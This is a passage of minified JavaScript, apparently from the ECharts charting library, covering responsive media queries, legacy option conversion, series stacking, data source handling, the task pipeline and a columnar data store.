e,n,i=this._api.getWidth(),r=this._api.getHeight(),o=this._mediaList,a=this._mediaDefault,s=[],l=[];if(!o.length&&!a)return l;for(var u=0,c=o.length;u<c;u++)sg(o[u].query,i,r)&&s.push(u);return!s.length&&a&&(s=[-1]),s.length&&(e=s,n=this._currentMediaIndices,e.join(",")!==n.join(","))&&(l=V(s,function(t){return C(-1===t?a.option:o[t].option)})),this._currentMediaIndices=s,l},t}();function sg(t,e,n){var i={width:e,height:n,aspectratio:e/n},r=!0;return E(t,function(t,e){var n=e.match(og);if(n&&n[1]&&n[2]){var o=n[1],a=n[2].toLowerCase();(function(t,e,n){return"min"===n?t>=e:"max"===n?t<=e:t===e})(i[a],t,o)||(r=!1)}}),r}var lg=E,ug=$,cg=["areaStyle","lineStyle","nodeStyle","linkStyle","chordStyle","label","labelLine"];function hg(t){var e=t&&t.itemStyle;if(e)for(var n=0,i=cg.length;n<i;n++){var r=cg[n],o=e.normal,a=e.emphasis;o&&o[r]&&(t[r]=t[r]||{},t[r].normal?I(t[r].normal,o[r]):t[r].normal=o[r],o[r]=null),a&&a[r]&&(t[r]=t[r]||{},t[r].emphasis?I(t[r].emphasis,a[r]):t[r].emphasis=a[r],a[r]=null)}}function pg(t,e,n){if(t&&t[e]&&(t[e].normal||t[e].emphasis)){var i=t[e].normal,r=t[e].emphasis;i&&(n?(t[e].normal=t[e].emphasis=null,L(t[e],i)):t[e]=i),r&&(t.emphasis=t.emphasis||{},t.emphasis[e]=r,r.focus&&(t.emphasis.focus=r.focus),r.blurScope&&(t.emphasis.blurScope=r.blurScope))}}function dg(t){pg(t,"itemStyle"),pg(t,"lineStyle"),pg(t,"areaStyle"),pg(t,"label"),pg(t,"labelLine"),pg(t,"upperLabel"),pg(t,"edgeLabel")}function fg(t,e){var n=ug(t)&&t[e],i=ug(n)&&n.textStyle;if(i){0;for(var r=0,o=ga.length;r<o;r++){var a=ga[r];i.hasOwnProperty(a)&&(n[a]=i[a])}}}function gg(t){t&&(dg(t),fg(t,"label"),t.emphasis&&fg(t.emphasis,"label"))}function vg(t){return Y(t)?t:t?[t]:[]}function yg(t){return(Y(t)?t[0]:t)||{}}function mg(t,e){lg(vg(t.series),function(t){ug(t)&&function(t){if(ug(t)){hg(t),dg(t),fg(t,"label"),fg(t,"upperLabel"),fg(t,"edgeLabel"),t.emphasis&&(fg(t.emphasis,"label"),fg(t.emphasis,"upperLabel"),fg(t.emphasis,"edgeLabel"));var e=t.markPoint;e&&(hg(e),gg(e));var n=t.markLine;n&&(hg(n),gg(n));var i=t.markArea;i&&gg(i);var r=t.data;if("graph"===t.type){r=r||t.nodes;var o=t.links||t.edges;if(o&&!J(o))for(var a=0;a<o.length;a++)gg(o[a]);E(t.categories,function(t){dg(t)})}if(r&&!J(r))for(a=0;a<r.length;a++)gg(r[a]);if((e=t.markPoint)&&e.data){var s=e.data;for(a=0;a<s.length;a++)gg(s[a])}if((n=t.markLine)&&n.data){var l=n.data;for(a=0;a<l.length;a++)Y(l[a])?(gg(l[a][0]),gg(l[a][1])):gg(l[a])}"gauge"===t.type?(fg(t,"axisLabel"),fg(t,"title"),fg(t,"detail")):"treemap"===t.type?(pg(t.breadcrumb,"itemStyle"),E(t.levels,function(t){dg(t)})):"tree"===t.type&&dg(t.leaves)}}(t)});var n=["xAxis","yAxis","radiusAxis","angleAxis","singleAxis","parallelAxis","radar"];e&&n.push("valueAxis","categoryAxis","logAxis","timeAxis"),lg(n,function(e){lg(vg(t[e]),function(t){t&&(fg(t,"axisLabel"),fg(t.axisPointer,"label"))})}),lg(vg(t.parallel),function(t){var e=t&&t.parallelAxisDefault;fg(e,"axisLabel"),fg(e&&e.axisPointer,"label")}),lg(vg(t.calendar),function(t){pg(t,"itemStyle"),fg(t,"dayLabel"),fg(t,"monthLabel"),fg(t,"yearLabel")}),lg(vg(t.radar),function(t){fg(t,"name"),t.name&&null==t.axisName&&(t.axisName=t.name,delete t.name),null!=t.nameGap&&null==t.axisNameGap&&(t.axisNameGap=t.nameGap,delete t.nameGap)}),lg(vg(t.geo),function(t){ug(t)&&(gg(t),lg(vg(t.regions),function(t){gg(t)}))}),lg(vg(t.timeline),function(t){gg(t),pg(t,"label"),pg(t,"itemStyle"),pg(t,"controlStyle",!0);var e=t.data;Y(e)&&E(e,function(t){$(t)&&(pg(t,"label"),pg(t,"itemStyle"))})}),lg(vg(t.toolbox),function(t){pg(t,"iconStyle"),lg(t.feature,function(t){pg(t,"iconStyle")})}),fg(yg(t.axisPointer),"label"),fg(yg(t.tooltip).axisPointer,"label")}function _g(t){t&&E(xg,function(e){e[0]in t&&!(e[1]in t)&&(t[e[1]]=t[e[0]])})}var xg=[["x","left"],["y","top"],["x2","right"],["y2","bottom"]],bg=["grid","geo","parallel","legend","toolbox","title","visualMap","dataZoom","timeline"],wg=[["borderRadius","barBorderRadius"],["borderColor","barBorderColor"],["borderWidth","barBorderWidth"]];function Sg(t){var e=t&&t.itemStyle;if(e)for(var n=0;n<wg.length;n++){var i=wg[n][1],r=wg[n][0];null!=e[i]&&(e[r]=e[i])}}function Mg(t){t&&"edge"===t.alignTo&&null!=t.margin&&null==t.edgeDistance&&(t.edgeDistance=t.margin)}function Tg(t){t&&t.downplay&&!t.blur&&(t.blur=t.downplay)}function kg(t,e){if(t)for(var n=0;n<t.length;n++)e(t[n]),t[n]&&kg(t[n].children,e)}function Cg(t,e){mg(t,e),t.series=da(t.series),E(t.series,function(t){if($(t)){var e=t.type;if("line"===e)null!=t.clipOverflow&&(t.clip=t.clipOverflow);else if("pie"===e||"gauge"===e){if(null!=t.clockWise&&(t.clockwise=t.clockWise),Mg(t.label),(r=t.data)&&!J(r))for(var n=0;n<r.length;n++)Mg(r[n]);null!=t.hoverOffset&&(t.emphasis=t.emphasis||{},(t.emphasis.scaleSize=null)&&(t.emphasis.scaleSize=t.hoverOffset))}else if("gauge"===e){var i=function(t,e){for(var n=e.split(","),i=t,r=0;r<n.length&&null!=(i=i&&i[n[r]]);r++);return i}(t,"pointer.color");null!=i&&function(t,e,n,i){for(var r,o=e.split(","),a=t,s=0;s<o.length-1;s++)null==a[r=o[s]]&&(a[r]={}),a=a[r];(i||null==a[o[s]])&&(a[o[s]]=n)}(t,"itemStyle.color",i)}else if("bar"===e){var r;if(Sg(t),Sg(t.backgroundStyle),Sg(t.emphasis),(r=t.data)&&!J(r))for(n=0;n<r.length;n++)"object"==typeof r[n]&&(Sg(r[n]),Sg(r[n]&&r[n].emphasis))}else if("sunburst"===e){var o=t.highlightPolicy;o&&(t.emphasis=t.emphasis||{},t.emphasis.focus||(t.emphasis.focus=o)),Tg(t),kg(t.data,Tg)}else"graph"===e||"sankey"===e?function(t){t&&null!=t.focusNodeAdjacency&&(t.emphasis=t.emphasis||{},null==t.emphasis.focus&&(t.emphasis.focus="adjacency"))}(t):"map"===e&&(t.mapType&&!t.map&&(t.map=t.mapType),t.mapLocation&&L(t,t.mapLocation));null!=t.hoverAnimation&&(t.emphasis=t.emphasis||{},t.emphasis&&null==t.emphasis.scale&&(t.emphasis.scale=t.hoverAnimation)),_g(t)}}),t.dataRange&&(t.visualMap=t.dataRange),E(bg,function(e){var n=t[e];n&&(Y(n)||(n=[n]),E(n,function(t){_g(t)}))})}var Ig=Xa(function(t){var e=mt();t.eachSeries(function(t){var n=t.get("stack");if(n){var i=e.get(n)||e.set(n,[]),r=t.getData(),o={stackResultDimension:r.getCalculationInfo("stackResultDimension"),stackedOverDimension:r.getCalculationInfo("stackedOverDimension"),stackedDimension:r.getCalculationInfo("stackedDimension"),stackedByDimension:r.getCalculationInfo("stackedByDimension"),isStackedByIndex:r.getCalculationInfo("isStackedByIndex"),data:r,seriesModel:t};if(!o.stackedDimension||!o.isStackedByIndex&&!o.stackedByDimension)return;i.push(o)}}),e.each(function(t){0!==t.length&&("seriesDesc"===(t[0].seriesModel.get("stackOrder")||"seriesAsc")&&t.reverse(),E(t,function(e,n){e.data.setCalculationInfo("stackedOnSeries",n>0?t[n-1].seriesModel:null)}),function(t){E(t,function(e,n){var i=[],r=[NaN,NaN],o=[e.stackResultDimension,e.stackedOverDimension],a=e.data,s=e.isStackedByIndex,l=e.seriesModel.get("stackStrategy")||"samesign";a.modify(o,function(o,u,c){var h,p,d=a.get(e.stackedDimension,c);if(isNaN(d))return r;s?p=a.getRawIndex(c):h=a.get(e.stackedByDimension,c);for(var f=NaN,g=n-1;g>=0;g--){var v=t[g];if(s||(p=v.data.rawIndexOf(v.stackedByDimension,h)),p>=0){var y=v.data.getByRawIndex(v.stackResultDimension,p);if("all"===l||"positive"===l&&y>0||"negative"===l&&y<0||"samesign"===l&&d>=0&&y>0||"samesign"===l&&d<=0&&y<0){d=Wo(d,y),f=y;break}}}return i[0]=d,i[1]=f,i})})}(t))})});var Dg,Ag,Pg,Lg,Og,Rg,Ng=function(t){this.data=t.data||(t.sourceFormat===mu?{}:[]),this.sourceFormat=t.sourceFormat||xu,this.seriesLayoutBy=t.seriesLayoutBy||bu,this.startIndex=t.startIndex||0,this.dimensionsDetectedCount=t.dimensionsDetectedCount,this.metaRawOption=t.metaRawOption;var e=this.dimensionsDefine=t.dimensionsDefine;if(e)for(var n=0;n<e.length;n++){var i=e[n];null==i.type&&Wf(this,n)===Bf&&(i.type="ordinal")}};function Bg(t){return t instanceof Ng}function zg(t,e,n){n=n||Vg(t);var i=e.seriesLayoutBy,r=function(t,e,n,i,r){var o,a;if(!t)return{dimensionsDefine:Fg(r),startIndex:a,dimensionsDetectedCount:o};if(e===vu){var s=t;"auto"===i||null==i?Hg(function(t){null!=t&&"-"!==t&&(j(t)?null==a&&(a=1):a=0)},n,s,10):a=K(i)?i:i?1:0,r||1!==a||(r=[],Hg(function(t,e){r[e]=null!=t?t+"":""},n,s,1/0)),o=r?r.length:n===wu?s.length:s[0]?s[0].length:null}else if(e===yu)r||(r=function(t){var e,n=0;for(;n<t.length&&!(e=t[n++]););if(e)return W(e)}(t));else if(e===mu)r||(r=[],E(t,function(t,e){r.push(e)}));else if(e===gu){var l=va(t[0]);o=Y(l)&&l.length||1}return{startIndex:a,dimensionsDefine:Fg(r),dimensionsDetectedCount:o}}(t,n,i,e.sourceHeader,e.dimensions);return new Ng({data:t,sourceFormat:n,seriesLayoutBy:i,dimensionsDefine:r.dimensionsDefine,startIndex:r.startIndex,dimensionsDetectedCount:r.dimensionsDetectedCount,metaRawOption:C(e)})}function Eg(t){return new Ng({data:t,sourceFormat:J(t)?_u:gu})}function Vg(t){var e=xu;if(J(t))e=_u;else if(Y(t)){0===t.length&&(e=vu);for(var n=0,i=t.length;n<i;n++){var r=t[n];if(null!=r){if(Y(r)||J(r)){e=vu;break}if($(r)){e=yu;break}}}}else if($(t))for(var o in t)if(wt(t,o)&&z(t[o])){e=mu;break}return e}function Fg(t){if(t){var e=mt();return V(t,function(t,n){var i={name:(t=$(t)?t:{name:t}).name,displayName:t.displayName,type:t.type};if(null==i.name)return i;i.name+="",null==i.displayName&&(i.displayName=i.name);var r=e.get(i.name);return r?i.name+="-"+r.count++:e.set(i.name,{count:1}),i})}}function Hg(t,e,n,i){if(e===wu)for(var r=0;r<n.length&&r<i;r++)t(n[r]?n[r][0]:null,r);else{var o=n[0]||[];for(r=0;r<o.length&&r<i;r++)t(o[r],r)}}function Gg(t){var e=t.sourceFormat;return e===yu||e===mu}var Wg=function(){function t(t,e){var n=Bg(t)?t:Eg(t);this._source=n;var i=this._data=n.data,r=n.sourceFormat;n.seriesLayoutBy;r===_u&&(this._offset=0,this._dimSize=e,this._data=i),Rg(this,i,n)}var e;return t.prototype.getSource=function(){return this._source},t.prototype.count=function(){return 0},t.prototype.getItem=function(t,e){},t.prototype.appendData=function(t){},t.prototype.clean=function(){},t.protoInitialize=((e=t.prototype).pure=!1,void(e.persistent=!0)),t.internalField=function(){var t;Rg=function(t,r,o){var a=o.sourceFormat,s=o.seriesLayoutBy,l=o.startIndex,u=o.dimensionsDefine,c=Og[tv(a,s)];if(A(t,c),a===_u)t.getItem=e,t.count=i,t.fillStorage=n;else{var h=Xg(a,s);t.getItem=U(h,null,r,l,u);var p=Kg(a,s);t.count=U(p,null,r,l,u)}};var e=function(t,e){t-=this._offset,e=e||[];for(var n=this._data,i=this._dimSize,r=i*t,o=0;o<i;o++)e[o]=n[r+o];return e},n=function(t,e,n,i){for(var r=this._data,o=this._dimSize,a=0;a<o;a++){for(var s=i[a],l=null==s[0]?1/0:s[0],u=null==s[1]?-1/0:s[1],c=e-t,h=n[a],p=0;p<c;p++){var d=r[p*o+a];h[t+p]=d,d<l&&(l=d),d>u&&(u=d)}s[0]=l,s[1]=u}},i=function(){return this._data?this._data.length/this._dimSize:0};function r(t){for(var e=0;e<t.length;e++)this._data.push(t[e])}(t={})[vu+"_"+bu]={pure:!0,appendData:r},t[vu+"_"+wu]={pure:!0,appendData:function(){throw new Error('Do not support appendData when set seriesLayoutBy: "row".')}},t[yu]={pure:!0,appendData:r},t[mu]={pure:!0,appendData:function(t){var e=this._data;E(t,function(t,n){for(var i=e[n]||(e[n]=[]),r=0;r<(t||[]).length;r++)i.push(t[r])})}},t[gu]={appendData:r},t[_u]={persistent:!1,pure:!0,appendData:function(t){this._data=t},clean:function(){this._offset+=this.count(),this._data=null}},Og=t}(),t}(),Ug=function(t){Y(t)||sa("series.data or dataset.source must be an array.")},Zg=((Dg={})[vu+"_"+bu]=Ug,Dg[vu+"_"+wu]=Ug,Dg[yu]=Ug,Dg[mu]=function(t,e){for(var n=0;n<e.length;n++){null==e[n].name&&sa("dimension name must not be null/undefined.")}},Dg[gu]=Ug,function(t,e,n,i){return t[i]}),Yg=((Ag={})[vu+"_"+bu]=function(t,e,n,i){return t[i+e]},Ag[vu+"_"+wu]=function(t,e,n,i,r){i+=e;for(var o=r||[],a=t,s=0;s<a.length;s++){var l=a[s];o[s]=l?l[i]:null}return o},Ag[yu]=Zg,Ag[mu]=function(t,e,n,i,r){for(var o=r||[],a=0;a<n.length;a++){var s=n[a].name,l=null!=s?t[s]:null;o[a]=l?l[i]:null}return o},Ag[gu]=Zg,Ag);function Xg(t,e){var n=Yg[tv(t,e)];return n}var jg=function(t,e,n){return t.length},qg=((Pg={})[vu+"_"+bu]=function(t,e,n){return Math.max(0,t.length-e)},Pg[vu+"_"+wu]=function(t,e,n){var i=t[0];return i?Math.max(0,i.length-e):0},Pg[yu]=jg,Pg[mu]=function(t,e,n){var i=n[0].name,r=null!=i?t[i]:null;return r?r.length:0},Pg[gu]=jg,Pg);function Kg(t,e){var n=qg[tv(t,e)];return n}var $g=function(t,e,n){return t[e]},Qg=((Lg={})[vu]=$g,Lg[yu]=function(t,e,n){return t[n]},Lg[mu]=$g,Lg[gu]=function(t,e,n){var i=va(t);return i instanceof Array?i[e]:i},Lg[_u]=$g,Lg);function Jg(t){var e=Qg[t];return e}function tv(t,e){return t===vu?t+"_"+e:t}function ev(t,e,n){if(t){var i=t.getRawDataItem(e);if(null!=i){var r=t.getStore(),o=r.getSource().sourceFormat;if(null!=n){var a=t.getDimensionIndex(n),s=r.getDimensionProperty(a);return Jg(o)(i,a,s)}var l=i;return o===gu&&(l=va(i)),l}}}var nv=/\{@(.+?)\}/g,iv=function(){function t(){}return t.prototype.getDataParams=function(t,e){var n=this.getData(e),i=this.getRawValue(t,e),r=n.getRawIndex(t),o=n.getName(t),a=n.getRawDataItem(t),s=n.getItemVisual(t,"style"),l=s&&s[n.getItemVisual(t,"drawType")||"fill"],u=s&&s.stroke,c=this.mainType,h="series"===c,p=n.userOutput&&n.userOutput.get();return{componentType:c,componentSubType:this.subType,componentIndex:this.componentIndex,seriesType:h?this.subType:null,seriesIndex:this.seriesIndex,seriesId:h?this.id:null,seriesName:h?this.name:null,name:o,dataIndex:r,data:a,dataType:e,value:i,color:l,borderColor:u,dimensionNames:p?p.fullDimensions:null,encode:p?p.encode:null,$vars:["seriesName","name","value"]}},t.prototype.getFormattedLabel=function(t,e,n,i,r,o){e=e||"normal";var a=this.getData(n),s=this.getDataParams(t,n);(o&&(s.value=o.interpolatedValue),null!=i&&Y(s.value)&&(s.value=s.value[i]),r)||(r=a.getItemModel(t).get("normal"===e?["label","formatter"]:[e,"label","formatter"]));return X(r)?(s.status=e,s.dimensionIndex=i,r(s)):j(r)?tf(r,s).replace(nv,function(e,n){var i=n.length,r=n;"["===r.charAt(0)&&"]"===r.charAt(i-1)&&(r=+r.slice(1,i-1));var s=ev(a,t,r);if(o&&Y(o.interpolatedValue)){var l=a.getDimensionIndex(r);l>=0&&(s=o.interpolatedValue[l])}return null!=s?s+"":""}):void 0},t.prototype.getRawValue=function(t,e){return ev(this.getData(e),t)},t.prototype.formatTooltip=function(t,e,n){},t}();function rv(t){var e,n;return $(t)?t.type&&(n=t):e=t,{text:e,frag:n}}function ov(t){return new av(t)}var av=function(){function t(t){t=t||{},this._reset=t.reset,this._plan=t.plan,this._count=t.count,this._onDirty=t.onDirty,this._dirty=!0}return t.prototype.perform=function(t){var e,n=this._upstream,i=t&&t.skip;if(this._dirty&&n){var r=this.context;r.data=r.outputData=n.context.outputData}this.__pipeline&&(this.__pipeline.currentTask=this),this._plan&&!i&&(e=this._plan(this.context));var o,a=c(this._modBy),s=this._modDataCount||0,l=c(t&&t.modBy),u=t&&t.modDataCount||0;function c(t){return!(t>=1)&&(t=1),t}a===l&&s===u||(e="reset"),(this._dirty||"reset"===e)&&(this._dirty=!1,o=this._doReset(i)),this._modBy=l,this._modDataCount=u;var h=t&&t.step;if(this._dueEnd=n?n._outputDueEnd:this._count?this._count(this.context):1/0,this._progress){var p=this._dueIndex,d=Math.min(null!=h?this._dueIndex+h:1/0,this._dueEnd);if(!i&&(o||p<d)){var f=this._progress;if(Y(f))for(var g=0;g<f.length;g++)this._doProgress(f[g],p,d,l,u);else this._doProgress(f,p,d,l,u)}this._dueIndex=d;var v=null!=this._settedOutputEnd?this._settedOutputEnd:d;0,this._outputDueEnd=v}else this._dueIndex=this._outputDueEnd=null!=this._settedOutputEnd?this._settedOutputEnd:this._dueEnd;return this.unfinished()},t.prototype.dirty=function(){this._dirty=!0,this._onDirty&&this._onDirty(this.context)},t.prototype._doProgress=function(t,e,n,i,r){sv.reset(e,n,i,r),this._callingProgress=t,this._callingProgress({start:e,end:n,count:n-e,next:sv.next},this.context)},t.prototype._doReset=function(t){var e,n;this._dueIndex=this._outputDueEnd=this._dueEnd=0,this._settedOutputEnd=null,!t&&this._reset&&((e=this._reset(this.context))&&e.progress&&(n=e.forceFirstProgress,e=e.progress),Y(e)&&!e.length&&(e=null)),this._progress=e,this._modBy=this._modDataCount=null;var i=this._downstream;return i&&i.dirty(),n},t.prototype.unfinished=function(){return this._progress&&this._dueIndex<this._dueEnd},t.prototype.pipe=function(t){(this._downstream!==t||this._dirty)&&(this._downstream=t,t._upstream=this,t.dirty())},t.prototype.dispose=function(){this._disposed||(this._upstream&&(this._upstream._downstream=null),this._downstream&&(this._downstream._upstream=null),this._dirty=!1,this._disposed=!0)},t.prototype.getUpstream=function(){return this._upstream},t.prototype.getDownstream=function(){return this._downstream},t.prototype.setOutputEnd=function(t){this._outputDueEnd=this._settedOutputEnd=t},t}(),sv=function(){var t,e,n,i,r,o={reset:function(l,u,c,h){e=l,t=u,n=c,i=h,r=Math.ceil(i/n),o.next=n>1&&i>0?s:a}};return o;function a(){return e<t?e++:null}function s(){var o=e%r*n+Math.ceil(e/r),a=e>=t?null:o<i?o:e;return e++,a}}();function lv(t,e){var n=e&&e.type;return"ordinal"===n?t:("time"!==n||K(t)||null==t||"-"===t||(t=+jo(t)),null==t||""===t?NaN:Number(t))}mt({number:function(t){return parseFloat(t)},time:function(t){return+jo(t)},trim:function(t){return j(t)?ht(t):t}});var uv=function(){function t(t,e){var n="desc"===t;this._resultLT=n?1:-1,null==e&&(e=n?"min":"max"),this._incomparable="min"===e?-1/0:1/0}return t.prototype.evaluate=function(t,e){var n=K(t)?t:Qo(t),i=K(e)?e:Qo(e),r=isNaN(n),o=isNaN(i);if(r&&(n=this._incomparable),o&&(i=this._incomparable),r&&o){var a=j(t),s=j(e);a&&(n=s?t:0),s&&(i=a?e:0)}return n<i?this._resultLT:n>i?-this._resultLT:0},t}();function cv(t){var e="",n=-1/0,i=-1/0,r=1/0,o=1/0;return t&&(null!=t.g&&(e+="G"+t.g,n=t.g),null!=t.ge&&(e+="GE"+t.ge,i=t.ge),null!=t.l&&(e+="L"+t.l,r=t.l),null!=t.le&&(e+="LE"+t.le,o=t.le)),{key:e,g:n,ge:i,l:r,le:o}}function hv(t,e){return e>t.g&&e>=t.ge&&e<t.l&&e<=t.le}var pv=function(){function t(){}return t.prototype.getRawData=function(){throw new Error("not supported")},t.prototype.getRawDataItem=function(t){throw new Error("not supported")},t.prototype.cloneRawData=function(){},t.prototype.getDimensionInfo=function(t){},t.prototype.cloneAllDimensionInfo=function(){},t.prototype.count=function(){},t.prototype.retrieveValue=function(t,e){},t.prototype.retrieveValueFromItem=function(t,e){},t.prototype.convertValue=function(t,e){return lv(t,e)},t}();function dv(t){var e=t.sourceFormat;if(!_v(e)){var n="";0,ua(n)}return t.data}function fv(t){var e=t.sourceFormat,n=t.data;if(!_v(e)){var i="";0,ua(i)}if(e===vu){for(var r=[],o=0,a=n.length;o<a;o++)r.push(n[o].slice());return r}if(e===yu){for(r=[],o=0,a=n.length;o<a;o++)r.push(A({},n[o]));return r}}function gv(t,e,n){if(null!=n)return K(n)||!isNaN(n)&&!wt(e,n)?t[n]:wt(e,n)?e[n]:void 0}function vv(t){return C(t)}var yv=mt();function mv(t,e,n,i){var r="";e.length||ua(r),$(t)||ua(r);var o=t.type,a=yv.get(o);a||ua(r);var s=V(e,function(t){return function(t,e){var n=new pv,i=t.data,r=n.sourceFormat=t.sourceFormat,o=t.startIndex,a="";t.seriesLayoutBy!==bu&&ua(a);var s=[],l={},u=t.dimensionsDefine;if(u)E(u,function(t,e){var n=t.name,i={index:e,name:n,displayName:t.displayName};if(s.push(i),null!=n){var r="";wt(l,n)&&ua(r),l[n]=i}});else for(var c=0;c<t.dimensionsDetectedCount;c++)s.push({index:c});var h=Xg(r,bu);e.__isBuiltIn&&(n.getRawDataItem=function(t){return h(i,o,s,t)},n.getRawData=U(dv,null,t)),n.cloneRawData=U(fv,null,t);var p=Kg(r,bu);n.count=U(p,null,i,o,s);var d=Jg(r);n.retrieveValue=function(t,e){var n=h(i,o,s,t);return f(n,e)};var f=n.retrieveValueFromItem=function(t,e){if(null!=t){var n=s[e];return n?d(t,e,n.name):void 0}};return n.getDimensionInfo=U(gv,null,s,l),n.cloneAllDimensionInfo=U(vv,null,s),n}(t,a)}),l=da(a.transform({upstream:s[0],upstreamList:s,config:C(t.config)}));return V(l,function(t,n){var i,r="";$(t)||ua(r),t.data||ua(r),_v(Vg(t.data))||ua(r);var o=e[0];if(o&&0===n&&!t.dimensions){var a=o.startIndex;a&&(t.data=o.data.slice(0,a).concat(t.data)),i={seriesLayoutBy:bu,sourceHeader:a,dimensions:o.metaRawOption.dimensions}}else i={seriesLayoutBy:bu,sourceHeader:0,dimensions:t.dimensions};return zg(t.data,i,null)})}function _v(t){return t===vu||t===yu}var xv,bv=typeof Uint32Array===pu?Array:Uint32Array,wv=typeof Uint16Array===pu?Array:Uint16Array,Sv=typeof Int32Array===pu?Array:Int32Array,Mv=typeof Float64Array===pu?Array:Float64Array,Tv={float:Mv,int:Sv,ordinal:Array,number:Array,time:Mv};function kv(t){return t>65535?bv:wv}function Cv(t){var e=t.constructor;return e===Array?t.slice():new e(t)}function Iv(t,e,n,i,r){var o=Tv[n||"float"];if(r){var a=t[e],s=a&&a.length;if(s!==i){for(var l=new o(i),u=0;u<s;u++)l[u]=a[u];t[e]=l}}else t[e]=new o(i)}var Dv=function(){function t(){this._chunks=[],this._rawExtent=[],this._extent=[],this._count=0,this._rawCount=0,this._calcDimNameToIdx=mt()}return t.prototype.initData=function(t,e,n){this._provider=t,this._chunks=[],this._indices=null,this.getRawIndex=this._getRawIdxIdentity;var i=t.getSource(),r=this.defaultDimValueGetter=xv[i.sourceFormat];this._dimValueGetter=n||r,this._rawExtent=[];Gg(i);this._dimensions=V(e,function(t){return{type:t.type,property:t.property}}),this._initDataFromProvider(0,t.count())},t.prototype.getProvider=function(){return this._provider},t.prototype.getSource=function(){return this._provider.getSource()},t.prototype.ensureCalculationDimension=function(t,e){var n=this._calcDimNameToIdx,i=this._dimensions,r=n.get(t);if(null!=r){if(i[r].type===e)return r}else r=i.length;return i[r]={type:e},n.set(t,r),this._chunks[r]=new Tv[e||"float"](this._rawCount),this._rawExtent[r]=[1/0,-1/0],r},t.prototype.collectOrdinalMeta=function(t,e){var n=this._chunks[t],i=this._dimensions[t],r=this._rawExtent,o=i.ordinalOffset||0,a=n.length;0===o&&(r[t]=[1/0,-1/0]);for(var s=r[t],l=o;l<a;l++){var u=n[l]=e.parseAndCollect(n[l]);isNaN(u)||(s[0]=Math.min(u,s[0]),s[1]=Math.max(u,s[1]))}i.ordinalMeta=e,i.ordinalOffset=a,i.type="ordinal"},t.prototype.getOrdinalMeta=function(t){return this._dimensions[t].ordinalMeta},t.prototype.getDimensionProperty=function(t){var e=this._dimensions[t];return e&&e.property},t.prototype.appendData=function(t){var e=this._provider,n=this.count();e.appendData(t);var i=e.count();return e.persistent||(i+=n),n<i&&this._initDataFromProvider(n,i,!0),[n,i]},t.prototype.appendValues=function(t,e){for(var n=this._chunks,i=this._dimensions,r=i.length,o=this._rawExtent,a=this.count(),s=a+Math.max(t.length,e||0),l=0;l<r;l++){Iv(n,l,(d=i[l]).type,s,!0)}for(var u=[],c=a;c<s;c++)for(var h=c-a,p=0;p<r;p++){var d=i[p],f=xv.arrayRows.call(this,t[h]||u,d.property,h,p);n[p][c]=f;var g=o[p];f<g[0]&&(g[0]=f),f>g[1]&&(g[1]=f)}return this._rawCount=this._count=s,{start:a,end:s}},t.prototype._initDataFromProvider=function(t,e,n){for(var i=this._provider,r=this._chunks,o=this._dimensions,a=o.length,s=this._rawExtent,l=V(o,function(t){return t.property}),u=0;u<a;u++){var c=o[u];s[u]||(s[u]=Oa()),Iv(r,u,c.type,e,n)}if(i.fillStorage)i.fillStorage(t,e,r,s);else for(var h=[],p=t;p<e;p++){h=i.getItem(p,h);for(var d=0;d<a;d++){var f=r[d],g=this._dimValueGetter(h,l[d],p,d);f[p]=g;var v=s[d];g<v[0]&&(v[0]=g),g>v[1]&&(v[1]=g)}}!i.persistent&&i.clean&&i.clean(),this._rawCount=this._count=e,this._extent=[]},t.prototype.count=function(){return this._count},t.prototype.get=function(t,e){if(!(e>=0&&e<this._count))return NaN;var n=this._chunks[t];return n?n[this.getRawIndex(e)]:NaN},t.prototype.getValues=function(t,e){var n=[],i=[];if(null==e){e=t,t=[];for(var r=0;r<this._dimensions.length;r++)i.push(r)}else i=t;r=0;for(var o=i.length;r<o;r++)n.push(this.get(i[r],e));return n},t.prototype.getByRawIndex=function(t,e){if(!(e>=0&&e<this._rawCount))return NaN;var n=this._chunks[t];return n?n[e]:NaN},t.prototype.getSum=function(t){var e=0;if(this._chunks[t])for(var n=0,i=this.count();n<i;n++){var r=this.get(t,n);isNaN(r)||(e+=r)}return e},t.prototype.getMedian=function(t){var e=[];this.each([t],function(t){isNaN(t)||e.push(t)}),Eo(e);var n=this.count();return 0===n?0:n%2==1?e[(n-1)/2]:(e[n/2]+e[n/2-1])/2},t.prototype.indexOfRawIndex=function(t){if(t>=this._rawCount||t<0)return-1;if(!this._indices)return t;var e=this._indices,n=e[t];if(null!=n&&n<this._count&&n===t)return t;for(var i=0,r=this._count-1;i<=r;){var o=(i+r)/2|0;if(e[o]<t)i=o+1;else{if(!(e[o]>t))return o;r=o-1}}return-1},t.prototype.getIndices=function(){var t,e=this._indices;if(e){var n=e.constructor,i=this._count;if(n===Array){t=new n(i);for(var r=0;r<i;r++)t[r]=e[r]}else t=new n(e.buffer,0,i)}else{t=new(n=kv(this._rawCount))(this.count());for(r=0;r<t.length;r++)t[r]=r}return t},t.prototype.filter=function(t,e){if(!this._count)return this;for(var n=this.clone(),i=n.count(),r=new(kv(n._rawCount))(i),o=[],a=t.length,s=0,l=t[0],u=n._chunks,c=0;c<i;c++){var h=void 0,p=n.getRawIndex(c);if(0===a)h=e(c);else if(1===a){h=e(u[l][p],c)}else{for(var d=0;d<a;d++)o[d]=u[t[d]][p];o[d]=c,h=e.apply(null,o)}h&&(r[s++]=p)}return s<i&&(n._indices=r),n._count=s,n._extent=[],n._updateGetRawIdx(),n},t.prototype.selectRange=function(t){var e=this.clone(),n=e._count;if(!n)return this;var i=W(t),r=i.length;if(!r)return this;var o=e.count(),a=new(kv(e._rawCount))(o),s=0,l=i[0],u=t[l][0],c=t[l][1],h=e._chunks,p=!1;if(!e._indices){var d=0;if(1===r){for(var f=h[i[0]],g=0;g<n;g++){((_=f[g])>=u&&_<=c||isNaN(_))&&(a[s++]=d),d++}p=!0}else if(2===r){f=h[i[0]];var v=h[i[1]],y=t[i[1]][0],m=t[i[1]][1];for(g=0;g<n;g++){var _=f[g],x=v[g];(_>=u&&_<=c||isNaN(_))&&(x>=y&&x<=m||isNaN(x))&&(a[s++]=d),d++}p=!0}}if(!p)if(1===r)for(g=0;g<o;g++){var b=e.getRawIndex(g);((_=h[i[0]][b])>=u&&_<=c||isNaN(_))&&(a[s++]=b)}else for(g=0;g<o;g++){for(var w=!0,S=(b=e.getRawIndex(g),0);S<r;S++){var M=i[S];((_=h[M][b])<t[M][0]||_>t[M][1])&&(w=!1)}w&&(a[s++]=e.getRawIndex(g))}return s<o&&(e._indices=a),e._count=s,e._extent=[],e._updateGetRawIdx(),e},t.prototype.map=function(t,e){var n=this.clone(t);return 